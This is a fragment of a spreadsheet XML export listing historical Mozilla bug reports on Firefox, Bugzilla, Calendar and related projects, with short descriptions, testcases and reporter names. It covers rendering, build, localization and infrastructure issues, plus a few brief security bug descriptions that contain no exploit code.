Vlad wrote an app to explore what parts of the native OS theme we can extract so he will be able to provide more specific details.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-389413</t>
  </si>
  <si>
    <t>LDAP account for ause for access to community build jumphost</t>
  </si>
  <si>
    <t>ause is going to be assuming the Calendar build duties from lilmatt (at least in part) so he will need an LDAP account to be able to access the calendar build machines via the community jumphost.
His ssh key is in bug 386736 if required.</t>
  </si>
  <si>
    <t>CORE-321877</t>
  </si>
  <si>
    <t>Content within  tag invisible (not treated as an unknown tag)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
(This occurs in FF1.5 but not 1.0)
Any content within  tags is not rendered whereas content in other unknown tags is rendered. This tag seems to get special treatment.
I hit this in an email message where the real text contained  (improperly escaped). In FF1.5 the entire email body was truncated at that point.
Reproducible: Always
Steps to Reproduce:
Open testcase
Actual Results:  
Lines 1 and 3 are visible
Expected Results:  
Lines 1 2 and 3 are visible
(as in FF1.0 and IE6)</t>
  </si>
  <si>
    <t>ytpete</t>
  </si>
  <si>
    <t>CORE-905989</t>
  </si>
  <si>
    <t>Assertion failure: target-&gt;isInterpretedConstructor() at jit/IonBuilder.cpp:5274</t>
  </si>
  <si>
    <t>The following testcase asserts on mozilla-central revision 1ed5a88cd4d0 (threadsafe build run with --fuzzing-safe --ion-eager):
function TestCase(n d e a) {}
function reportCompare() {
  new TestCase()
}
reportCompare()
TestCase = ParallelArray
try {
  reportCompare()
} catch(exc1) {}
reportCompare()</t>
  </si>
  <si>
    <t>CALENDAR-477474</t>
  </si>
  <si>
    <t>Remove searchplugins occurrences from locales/Makefile.in</t>
  </si>
  <si>
    <t>See bug 477384. This is its clone for Calendar (sipaq seems to have forgotten this part).</t>
  </si>
  <si>
    <t>BUGZILLA-76157</t>
  </si>
  <si>
    <t>Give proper error message on non-numeric sortkey.</t>
  </si>
  <si>
    <t>If I try to add or edit a milestone such that the sortkey is not a number I get
an error like:
INSERT INTO milestones ( value product sortkey ) VALUES ( 'A''TestProduct'
K): Unknown column 'K' in 'field list' at
globals.pl line 173. 
This should check the sortkey is a number and give a reasonable error message if
not.
This might be a security problem but I can't figure out how to might make it
one.</t>
  </si>
  <si>
    <t>CORE-439164</t>
  </si>
  <si>
    <t>[FIXr]intermittent mochitest failure in test_bug413310</t>
  </si>
  <si>
    <t>We're investigating intermittent test failures and find that this test
sometimes passes sometimes fails even when there are no code changes. Its
happened with a few builds this week. (It was happening before as well as
after the recent NetApp woes). 
Can you review how this test was written and see if the test can be made more
robust? 
suite: mochitest
stdio line#13065
error msg: *** 13678 ERROR FAIL Error thrown during test: doNextStep is not defined /tests/docshell/test/test_bug413310.html	
Note: This test does not *break* builds they only fail out as orange.</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-467552</t>
  </si>
  <si>
    <t>SHOWFOR doesn't hide elements of the table of contents on initial load</t>
  </si>
  <si>
    <t>In the Firefox Crashes when you open it article if you load the page with a Firefox 2 useragent it shows material for Firefox 2 and certain sections are hidden like 
# Crash when using Spector Pro
However while they're hidden in the article they're not hidden in the TOC.  Items for non-Windows however ARE hidden.  It seems that SHOWFOR is not triggering correctly for the TOC.
If you click on the Show content for Firefox 2 link it fixes itself.</t>
  </si>
  <si>
    <t>CORE-90205</t>
  </si>
  <si>
    <t>{ib} Most links on this site crash Mozilla</t>
  </si>
  <si>
    <t>Build ID: 2001071008</t>
  </si>
  <si>
    <t>BUGZILLA-351958</t>
  </si>
  <si>
    <t>Allow buidling the API documentation without the rest of the build environment</t>
  </si>
  <si>
    <t>Allow makedocs.pl to build the API documents without the rest of the environment being needed.</t>
  </si>
  <si>
    <t>JSS-215190</t>
  </si>
  <si>
    <t>PK11Store_deleteCert not deleting CA created certs</t>
  </si>
  <si>
    <t>PK11Store_deleteCert does not delete CA created Certs</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-474832</t>
  </si>
  <si>
    <t>update public failures</t>
  </si>
  <si>
    <t>Created attachment 358247
public-failures.txt patch</t>
  </si>
  <si>
    <t>BUGZILLA-282790</t>
  </si>
  <si>
    <t>Saving a search using a name which gets truncated to an identical name already stored causes bugzilla to report an error.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 Q312461 SV1 .NET CLR 1.1.4322)
Build Identifier: 
If you try to add a long name as the saved search name it truncates it.
Then if you try the same long name again you will get the error message.
I presume the code checks the name as it was typed in and not the truncated 
part so it thinks its unique.
The error is that an entry exists with the same truncated name.
Reproducible: Always
Actual Results:  
Software error:
DBD::mysql::st execute failed: Duplicate entry '8-RESOLVED (FIXED in the past 
3 weeks) Release+ Comment contains L' for key 1 [for Statement INSERT INTO 
namedqueries (userid name query linkinfooter)
                     VALUES (8 'RESOLVED (FIXED in the past 3 weeks) Release+ 
Comment contains 
LBT_8_0_FIXES' 'query_format=advanced&amp;short_desc_type=allwordssubstr&amp;short_des
c=&amp;long_desc_type=substring&amp;long_desc=&amp;bug_file_loc_type=allwordssubstr&amp;bug_fil
e_loc=&amp;status_whiteboard_type=allwordssubstr&amp;status_whiteboard=&amp;keywords_type=a
llwords&amp;keywords=&amp;bug_status=RESOLVED&amp;resolution=FIXED&amp;emailassigned_to1=1&amp;emai
ltype1=substring&amp;email1=&amp;emailassigned_to2=1&amp;emailreporter2=1&amp;emailcc2=1&amp;emailt
ype2=substring&amp;email2=&amp;bugidtype=include&amp;bug_id=&amp;chfieldfrom=3w&amp;chfieldto=Now&amp;c
hfield=resolution&amp;chfieldvalue=FIXED&amp;field0-0-0=longdesc&amp;type0-0-
0=substring&amp;value0-0-0=LBT_8_0_FIXES&amp;field1-0-0=flagtypes.name&amp;type1-0-
0=substring&amp;value1-0-0=Release%2B' 1)] at Bugzilla/DB.pm line 62
	Bugzilla::DB::SendSQL('INSERT INTO namedqueries (userid name query 
linkinfooter)\x{a}...') called at C:/tools/wwwroot/casemgr/buglist.cgi line 396</t>
  </si>
  <si>
    <t>nitroxico2</t>
  </si>
  <si>
    <t>CORE-355126</t>
  </si>
  <si>
    <t>stealing pictures via canvas and http redirect</t>
  </si>
  <si>
    <t>stealing pictures via canvas and http redirect
using a canvases drawImage toDataURL and an image that is redirected 
via the http protocolit is possible to get the content of arbitrary 
accessible http images.
affects both trunk and 2.0 branch.
testcase to follow.</t>
  </si>
  <si>
    <t>CORE-328834</t>
  </si>
  <si>
    <t>Removing input using the backspace key should require the same number of keystrokes that were used for generating this input regardless of input directionality.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Going backwards using the backspace key through a typed stream which consists of both Latin and Hebrew characters requires an additional keystroke whenever a switch in directionality occurs.
Reproducible: Always
Steps to Reproduce:
1. Type a Hebrew letter followed by a Latin one (or vice versa).
2. Hit backspace twice.
Actual Results:  
Only one of the letters deleted.
Expected Results:  
Both letters should be deleted.
Roots of this behavior can be traced through Uri's essay on Bidi editing http://wiki.mozilla.org/User:Uri/Bidi_editing . I and I believe other touch typists that are used to backspace backwards for making corrections find this discrepancy quite disruptive.</t>
  </si>
  <si>
    <t>pvoid.pub+bugzilla</t>
  </si>
  <si>
    <t>CORE-478755</t>
  </si>
  <si>
    <t>Add Verisign's Class 3 G5 CA to the 1.8 branch to resolve smtp.mac.com issue</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O it-IT rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O it-IT rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14
Recently Apple renewed the security certificate for its SMTP server smtp.mac.com and now both SeaMonkey 1.1.14 and Thunderbird 2.0.0.19 cannot verify the identity of the SMTP server. If I try to send an e-mail with TLS through smtp.mac.com now I always get the message: Unable to verify the identity of smtp.mac.com as a trusted site.. That's because the last server's security certificate is based on the G5 version of the Verisign Class 3 CA that's missing from the products based on the Gecko 1.8 branch. I checked and Firefox 3.0.6 based on the 1.9 branch has got the G5 version of the certificate.
See this mozillaZine forum's topic for screenshots:
.
Reproducible: Always
Steps to Reproduce:
1. Download and install SeaMonkey 1.1.14 or Thunderbird 2.0.0.19.
2. Create a fake account and try to send e-mails with TLS through the smtp.mac.com SMTP server.
Actual Results:  
An alert message that states Unable to verify the identity of smtp.mac.com as a trusted site. is displayed.
Expected Results:  
The MUA should successfully verify the identity of the SMTP server.
The smtp.mac.com SMTP server is used by Apple's MobileMe (formerly .Mac) subscribers.</t>
  </si>
  <si>
    <t>xfox.mozilla</t>
  </si>
  <si>
    <t>MOZILLA.ORG-350184</t>
  </si>
  <si>
    <t>l10n repository out of synch on cvs-mirror</t>
  </si>
  <si>
    <t>Not exactly sure how and why but this is what I see inside my check-out of l10n with my ssh-account I'm in l10n/de/browser/chrome/browser/safebrowsing:
$ cvs -d:pserver:anonymous@cvs-mirror.mozilla.org:/l10n status eula.dtd 
cvs status: eula.dtd is no longer in the repository
===================================================================
File: eula.dtd          Status: Entry Invalid
   Working revision:    1.1.2.1
   Repository revision: No revision control file
   Sticky Tag:          MOZILLA_1_8_BRANCH - MISSING from RCS file!
   Sticky Date:         (none)
   Sticky Options:      (none)
Axel@Mojo /cygdrive/c/Sources/MOZILLA_1_8_BRANCH/l10n/de/browser/chrome/browser/safebrowsing
$ cvs status eula.dtd 
===================================================================
File: eula.dtd          Status: Up-to-date
   Working revision:    1.1.2.1
   Repository revision: 1.1.2.1 /l10n/l10n/de/browser/chrome/browser/safebrowsing/Attic/eula.dtdv
   Sticky Tag:          MOZILLA_1_8_BRANCH (branch: 1.1.2)
   Sticky Date:         (none)
   Sticky Options:      (none)
That file got initally added on the trunk on 2006/08/24 17:40:04.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-516499</t>
  </si>
  <si>
    <t>Buy 11 wall plugs for N810s</t>
  </si>
  <si>
    <t>We now have 11 test harnesses to put N810s.  This will eliminate the battery and charger as possible problems and save us from having to replace the UK power adapters that are causing issues.  Could we please order 11 of these:
http://search.digikey.com/scripts/DkSearch/dksus.dll?Detail&amp;name=T1040-P5RP-ND</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-82885</t>
  </si>
  <si>
    <t>Page Info on a blank page is goofy</t>
  </si>
  <si>
    <t>Pages that exhibit this behavior:
-Startup page when you're default is to have no page
-about:blank
-about:
-about:mozilla
Go to one of these pages and click on the lock icon.
You'll see two problems.
(1) The General tab is selected when it should be the Security tab.
(2) The Security tab contains only the View button and an  tag.
The problem is that these pages come from your hard drive so phrases like Web
site identity not verified don't apply.  Maybe we just say something like This
page comes from your hard drive not the network.
The odd thing is that if you use an URL like file:///C:/My%20Documents/foo.txt
you'll get a normal message implying that this text came through the Internet.
I think the fix for this bug at this time is to just make these about: like
pages behave like the ones that come from your hard drive.
Other ideas?</t>
  </si>
  <si>
    <t>ddrinan0264</t>
  </si>
  <si>
    <t>MOZILLA.ORG-224135</t>
  </si>
  <si>
    <t>website CVS access request for mike.morgan@oregonstate.edu</t>
  </si>
  <si>
    <t>I would like to request website CVS access for Mike Morgan with write access to
the /projects/bugzilla directory.
I'll vouch.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-460956</t>
  </si>
  <si>
    <t>XML and XMLList objects do not implement toSource()</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3
Build Identifier: 
XML and XMLList do not currently implement the toSource() method. The inherited toSource() produces a bogus JavaScript object:
x = foo
x.toSource()
({0:{}})
Reproducible: Always</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-474865</t>
  </si>
  <si>
    <t>Deleting Community Edition Page</t>
  </si>
  <si>
    <t>Community Editions are no longer authorized.  Therefore please delete the Community Edition page at http://www.mozilla.org/foundation/trademarks/community-edition-policy.html.
We are in the process of updating the trademark policy and expect to have a new policy posted by the end of February which will also delete the Community Editions section in the Trademark Policy.</t>
  </si>
  <si>
    <t>FIREFOX-527204</t>
  </si>
  <si>
    <t>Modality of Options... and child dialogs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.1 en-US rv:1.9.3a1pre) Gecko/20091105 Minefield/3.7a1pre (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.1 en-US rv:1.9.3a1pre) Gecko/20091105 Minefield/3.7a1pre (.NET CLR 3.5.30729)
Why is the Options... dialog modal? No changed in the options dialog will result in an immediate change of rendering of tabs or other parts of the window. So I don't understand why it should block the rest of the window. Furthermore if you are new to Firefox and you use a tutorial to change some props you can't switch between the tut and the options dialog (that's not quite comfortable). The only thing you could do is open another window of Firefox and change the options there.
So I think the options shouldn't be modal.
And another problem with child dialogs:
If I open the Add-ons dialog from the options dialog there are all three controls - close full size and minimize - but at least the minimize-control doesn't make any sense. If I minimize the addon dialog I still can't do anything in the options dialog because the addon dialog is modal too. Why? If I open the addon dialog from the menu Tools it isn't modal. But from Options it is. Doesn't make any sense to me...
(All the other dialogs opened from Options that have these three controls aren't modal.)
And last: In the Advanced tab of Options many buttons haven't got the ... at the end even tough they open a new dialog.
Reproducible: Always</t>
  </si>
  <si>
    <t>nikita.ppv</t>
  </si>
  <si>
    <t>CORE-297607</t>
  </si>
  <si>
    <t>change ua string for Intel-based Macs</t>
  </si>
  <si>
    <t>Summary says it all. Right now we would send a hardcoded string with PPC in it.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-388389</t>
  </si>
  <si>
    <t>migrate nsExternalHelperAppService storage code to nsHandlerService</t>
  </si>
  <si>
    <t>The code in nsExternalHelperAppService.cpp that stores and retrieves information about MIME and protocol handlers in the mimeTypes.rdf datasource (f.e. FillContentHandlerProperties) should be migrated to the new nsHandlerService.js where we're consolidating access to that datastore behind a unit-tested API so we can switch datastores from RDF to f.e. SQLite in the future.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-473411</t>
  </si>
  <si>
    <t>the rule for DIST_FILES should create dist/bin</t>
  </si>
  <si>
    <t>Created attachment 356751
makes it dependant on dist/bin</t>
  </si>
  <si>
    <t>WEBMAKER_GRAVEYARD-981704</t>
  </si>
  <si>
    <t>Popcorn Maker</t>
  </si>
  <si>
    <t>Popcorn Maker goes into infinite reload loop if error occurs before backup runs</t>
  </si>
  <si>
    <t>The popcorn crash reporter has a bit of code like this inside it's window.onerror handler:
function attemptRecovery() {
  window.location.reload( true )
}
try {
  butter.project.useBackup()
  _dialog = Dialog.spawn( crash { data: crashReport } )
  _dialog.listen( close function() { _dialog = null } )
  _dialog.open()
} catch( e ) {
  attemptRecovery()
}
It's possible to have Popcorn Maker go into an infinite reload loop if one of those lines of code fails to run because it will fall through to the attemptRecovery function which reloads the page.
The problem here is calling butter.project.useBackup() before you've saved a backup:
var data = JSON.parse( __butterStorage.getItem( butter-backup-project ) )
data.useBackup = true // What if data is undefined?
Preventing useBackup from bailing out will make the crash reporter dialog appear more often. Hooray!</t>
  </si>
  <si>
    <t>CORE-260314</t>
  </si>
  <si>
    <t>UMR in nsSHEntry::SetLayoutHistoryState</t>
  </si>
  <si>
    <t>with the patch from bug 252023 mSaveLayoutState can be used uninitialized in
SetLayoutHistoryState in a debug build (it's the NS_ENSURE_TRUE macro)
conceivably the first time the method is called.  valgrind complains about this
at startup consistently.</t>
  </si>
  <si>
    <t>FIREFOX-466072</t>
  </si>
  <si>
    <t>Remove unused in-browser EULA prompt</t>
  </si>
  <si>
    <t>Created attachment 349319
Patch v.1
Bug 456439 landed the about:rights implementation and changed the fallback user interaction from display a EULA and require acceptance to show a notification bar for about:rights. Bug 462254 then removed the EULAs in the installers.
456439 should have also removed the now-dead support for displaying a EULA at runtime since the code for invoking it no longer exists.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-290399</t>
  </si>
  <si>
    <t>Deer Park - corporate deployment improvements</t>
  </si>
  <si>
    <t>tracking bug for deer park release (i.e. necko cache etc.)</t>
  </si>
  <si>
    <t>CORE-138681</t>
  </si>
  <si>
    <t xml:space="preserve">Inconsistent </t>
  </si>
  <si>
    <t xml:space="preserve">From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0rc1)
Gecko/20020417
BuildID:    2002041711
Preformatted text elements that have text
direction set right-to-left and that make use of
the deprecated attribute width can be torn apart
when their display window is wide enough.
Reproducible: Always
Steps to Reproduce:
1. View the attached html using Mozilla.
2. Make the display full screen.
3. Observe the third block of preformatted text
   the one with width=20.
Actual Results:  The first line of the third preformatted text
block is split in two.  The second half of this
first line and the last word appear far to the
left of where they should be.
Expected Results:  All three of the preformatted text blocks
should be aligned right.  The last one might have
three lines positioned one above the other.
&lt;!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.01//EN
     http://www.w3.org/TR/html4/strict.dtd&gt;
PRE Width
</t>
  </si>
  <si>
    <t>jacobs</t>
  </si>
  <si>
    <t>TOOLKIT-396129</t>
  </si>
  <si>
    <t>Add incompatible update start and done states to nsIAddonUpdateListener</t>
  </si>
  <si>
    <t>Add states for checking compatibility information during an incompatible update check in nsIAddonUpdateListener. nsIAddonUpdateListener currently just forwards the states from nsIXPIProgressDialog which isn't sufficient for the extension manager since we can successfully install and add-on based on its update datasource's compatibility info. Without this we are unable to determine when an installations has actually finished which causes the following with current trunk builds:
1) Restart button is enabled before the installation has actually finished during normal operations.
2) Continue button is enabled before the installation has actually finished during startup.
3) Tests have to use a timeout (see bug 395430).
We also display an additional add-on in the ui during an incompatible update check which I plan on also fixing in this bug.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-291451</t>
  </si>
  <si>
    <t>https://secure.postplaza.nl/ contains Win32 IE only site navigation</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 nl-NL rv:1.7.6) Gecko/20050405 Epiphany/1.6.1 (Ubuntu) (Ubuntu package 1.0.2)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 nl-NL rv:1.7.6) Gecko/20050405 Epiphany/1.6.1 (Ubuntu) (Ubuntu package 1.0.2)
The site-navigation menus on https://secure.postplaza.nl/tracktrace/ only work
in IE (&gt;=5) on Win32. On non-IE browsers the menus don't disappear when leaving
them making the site very hard to use.
I contacted the operators who responded negative to my change request. I will
attach the mailings.
Reproducible: Always
Steps to Reproduce:
1. Open https://secure.postplaza.nl/tracktrace/
2. Move the mouse cursor over one of the menu-items (like 'Post versturen')
3. Move the mouse to the next menu-item (like 'Post ontvangen')
Actual Results:  
The first menu is still visible below and besides the next menu.
Expected Results:  
The first menu should disappear after another menu-item is displayed.</t>
  </si>
  <si>
    <t>FIREFOX-318641</t>
  </si>
  <si>
    <t>Chevron on toolbar should be right-justified</t>
  </si>
  <si>
    <t>The chevron for overflow on the Personal toolbar should be justified right at the edge of the window.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-271736</t>
  </si>
  <si>
    <t>Update product missing from enter_bug and describecomponents lists</t>
  </si>
  <si>
    <t>The new Update product is missing from the enter_bug list. Perhaps it lacks a
categorization?</t>
  </si>
  <si>
    <t>jens.b</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-378649</t>
  </si>
  <si>
    <t>Copyright year in sv-SE Sunbird 0.5pre build is wrong</t>
  </si>
  <si>
    <t xml:space="preserve">Copyright year in sv-SE Sunbird 0.5pre build is wrong should be 2007
</t>
  </si>
  <si>
    <t>CALENDAR-325459</t>
  </si>
  <si>
    <t>monthview's relayout fails</t>
  </si>
  <si>
    <t>monthview's relayout does some math with durations but that fails due to a bug with adding negative durations.
And if it succeeds it gets the wrong duration (34 days that's not a multiple of 7)
And fixing that uncovers other bugs...</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-225394</t>
  </si>
  <si>
    <t>figure out a way to disable popups on minimo</t>
  </si>
  <si>
    <t>don't even think we need ui to turn if on and off :-)</t>
  </si>
  <si>
    <t>FIREFOX-215269</t>
  </si>
  <si>
    <t>if bookmark description = keyword custom keyword breaks</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Setting a bookmark's Description to be the same its Keyword will make the custom
keyword for that bookmark not work. Erase the Description or change it to
something else and the custom keyword for that bookmark works again.
I stumbled upon this because I thought it would be useful to set the description
to be the same as the keyword so I would remember the keyword easily by just
browsing the bookmark manager.
Reproducible: Always
Steps to Reproduce:
1. Open Bookmark Sidebar or Bookmark Manager
2. Right-click a Bookmark and choose Properties
3. On the Info Tab set the Keyword to something (Ex.: foo) and the Description
to the same value (foo)
4. Click Ok
5. Go to the Address bar enter foo
Actual Results:  
Example 1:
Name: Blue's News
URL: http://www.bluesnews.com/
Keyword: blues
Description: blues
DOESN'T WORK I get a 404 on http://blues/
Example 2:
Name: Blue's News
URL: http://www.bluesnews.com/
Keyword: blues
Description: whatever
WORKS I enter 'blues' in the Address Bar and it goes to http://www.bluesnews.com/
Expected Results:  
The custom keyword should work for a particular bookmark no matter what the
description for that bookmark is. I see no reason for any change in behaviour
based on the value of the description field.</t>
  </si>
  <si>
    <t>NSPR-238842</t>
  </si>
  <si>
    <t>Avoid the copying of va_list in prprf.c</t>
  </si>
  <si>
    <t>When we added the support for numbered argument list
to prprf.c we added the VARARGS_ASSIGN macro which
has become a porting nightmare:
 /*
 ** Note: on some platforms va_list is defined as an array
 ** and requires array notation.
 */
 #if (defined(LINUX) &amp;&amp; defined(__x86_64__))
 #define VARARGS_ASSIGN(foo bar) __va_copy((foo) (bar))
 #elif (defined(LINUX) &amp;&amp; defined(__powerpc__)) || \
     (defined(LINUX) &amp;&amp; defined(__s390__)) || \
     (defined(LINUX) &amp;&amp; defined(__s390x__)) || \
     defined(WIN16) || defined(QNX) || \
     (defined(__NetBSD__) &amp;&amp; defined(__powerpc__) &amp;&amp; \
     __NetBSD_Version__ &lt; 105000000)
 #define VARARGS_ASSIGN(foo bar) foo[0] = bar[0]
 #else
 #define VARARGS_ASSIGN(foo bar) (foo) = (bar)
 #endif
The VARARGS_ASSIGN macro is actually the new va_copy
macro added in C99.  However the C Standard says
that va_copy must be matched with a corresponding
va_end in the same function.  It is hard to meet
that requirement.  Furthermore it is not clear
whether older compilers which don't support va_copy
require VARAGS_ASSIGN be matched with a corresponding
va_end in the same function.  We would need to
handle the platform differences in that aspect as
well.
Another problem is the following assignment statement
in dosprintf:
            ap = nas[i-1].ap
It is not clear whether that is legal portable C.
A possible solution is to declare a local variable:
    va_list *pap = 
which gets initialized to the address of the argument
ap replace the above assignment statement by:
            pap = 
and replace all occurrences of ap in the function by
*pap that is va_arg(ap xxx) would become
va_arg(*pap xxx).  This looks a little strange.
To fix this problems I propose that we rewrite the
code so that we don't need to copy any va_list.</t>
  </si>
  <si>
    <t>SEAMONKEY-18957</t>
  </si>
  <si>
    <t>UnknownContentTypeHandler needs to implement an event sink getter.</t>
  </si>
  <si>
    <t>In order for the uknown content type handler to propogate progress notifications
(and thus show bytes downloaded and progress meter) it needs to pass an event
sink getter into it's AsyncRead|OpenInputStream channel calls.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-494049</t>
  </si>
  <si>
    <t>Archive SQL project directory on www.mozilla.org</t>
  </si>
  <si>
    <t>If the SQL project directory on www.mozilla.org is no longer being used
I'd like to remove those pages from the repository.  All links will
automatically send people to the relevant pages on the archive sites in case
any one is looking for this content.
http://www-archive.mozilla.org/projects/sql/</t>
  </si>
  <si>
    <t>CORE-225478</t>
  </si>
  <si>
    <t>Can't click on  element with :hover and :after</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4.1) Gecko/20031008
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4.1) Gecko/20031008
When we define in CSS a style with the pseudo selectors :hover:after with a
content (for exemple adding a flag after a link when the mouse is over it) we
can't click on this link.
Ctrl+clik middle click and right click works but not left click.
Reproducible: Always
Steps to Reproduce:
1. Write a CSS line lite : a:hover:after {content : 'what you want'}
2. Try to click on a link with this style
Actual Results:  
When we click on the link nothing occures
Expected Results:  
Mozilla should load the linked page with the same behaviour if it was no style
Tested with : Mozilla 1.4.1 Firebird 0.7 Epiphany 1.0.3 in differents debians
and on a Mandrake
Seems to work with windows...</t>
  </si>
  <si>
    <t>xanthor+bz</t>
  </si>
  <si>
    <t>CORE-187907</t>
  </si>
  <si>
    <t>Expr::toString should be removed or debug-only</t>
  </si>
  <si>
    <t>We should not use Expr::toString when outputting error-messages. Once we start
optimizing XPath-expressions there is no way we can recreate the
expression-string to something that is close to what the user typed.
So the question is do we want to remove Expr::toString entierly or do we wanna
keep it around for debugging-purposes?
MSVC can show the complete object-tree from just an Expr* so I don't really
need ::toString don't know about gdb/CodeWarrior though.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-358647</t>
  </si>
  <si>
    <t>nsIAbDirectory.supportsMailingLists is inconsistent.</t>
  </si>
  <si>
    <t>nsIAbDirectory.supportsMailingLists is inconsistent - highlighted by work in progress on bug 358333.
For instance getting a directory with the uri:
moz-abldapdirectory://ldap_2.servers.pudsey
supports returns false isMailList returns false - both as expected. With uri:
moz-abmdbdirectory://impab-10.mab
supports returns true isMailList returns false - again as expected. With uri:
moz-abmdbdirectory://impab-8.mab/MailList1
supports returns true isMailList returns true. At first glance this is sort of expected because a moz-abmdbdirectory supports mailing lists. However it could be taken to imply that we support nested mailing lists - which we don't. Therefore I think this should actually be supports returns false isMailList returns true.</t>
  </si>
  <si>
    <t>TOOLKIT-143344</t>
  </si>
  <si>
    <t>Download progress meter is left-to-right when UI is right-to-left</t>
  </si>
  <si>
    <t>Description: when the interface is aligned to the right e.g. when using a RTL
language (like hebrew or arabic) the progress meter in the download manager
should move from right to left.
Steps to reproduce:
1. aligning the interface to the right: add these lines to the file intl.css in
the locale\en-US\global in the en-US.jar file (the language pack file in the
chrome folder):
windowdialogwizardpage {
  direction: rtl
}
menu { direction: rtl }
tree { direction: rtl }
2. Download a file in Mozilla
3. Watch the progress meter in the download manager.
Actual results: the bar moves from left to right.
Expected results: the bar should move from right to left.
The progress meter in the status bar doesn't have this problem btw.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-252059</t>
  </si>
  <si>
    <t>Update User Agent Switcher Extension</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040628 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040628 Firefox/0.9.1
I have just released version 0.5 of the User Agent Switcher extension - please
update the information on update.mozilla.org.
Version: 0.5
Release Date: 7-18-2004
Supported Browsers: Mozilla 1.0-1.7.1+ Firefox 0.6-0.9.2+
Size: 16kb
The updated XPI is at the same location as the previous XPI:
http://downloads.mozdev.org/useragentswitcher/useragentswitcher.xpi
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-392894</t>
  </si>
  <si>
    <t>L10n Testresults not displayed</t>
  </si>
  <si>
    <t>I noticed this during the L10n Test for Thunderbird 1.5.0.13
I choosed a locale to test and run the L10n Test. Even if i complete a whole testrun no result is shown. 
When i check the results the tests are all shown as en-US?</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-501647</t>
  </si>
  <si>
    <t>Please QA the Packard Bell Partner Repack (3.5)</t>
  </si>
  <si>
    <t>Please start the QA review process on the 3.0.11 version of the Packard Bell partner distribution of Firefox.
The repack worksheet is located at:
https://wiki.mozilla.org/Partnering:Repacks:Firefox3:PackardBell
Please note that the installers until QA'd and digitally signed are password protected. Distributions will be publicly available once they are QA'd and signed.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-81939</t>
  </si>
  <si>
    <t>Can't logon to bugzilla with userid mahar@eg.ibm.com</t>
  </si>
  <si>
    <t>Bugzilla user Maha Abou El-Rous can't logon with userid mahar@eg.ibm.com.
------ Begin copy from Maha's email ------
I have already requested that my password be sent and tried it more than one I 
can't get a logon through with that mail ID (mahar@eg.ibm.com). I can still 
logon with my hotmail ID (mrous@hotmail.com) however I can't get to do a 
simple task I'm always requested to legitimate logon!!
------ End copy from Maha's email ------
Note: userid mahar@eg.ibm.com is the main id used by Maha for Bugzilla.
Please re-assign as appropriate in case Miscellaneous is the wrong component 
for this requests.</t>
  </si>
  <si>
    <t>andreasb</t>
  </si>
  <si>
    <t>CORE-224526</t>
  </si>
  <si>
    <t>Page isn't scrolled using slider.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.6a) Gecko/20031024 Camino/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.6a) Gecko/20031103 Camino/0.7+
On 20031103 self-build Page isn't scrolled using slider.
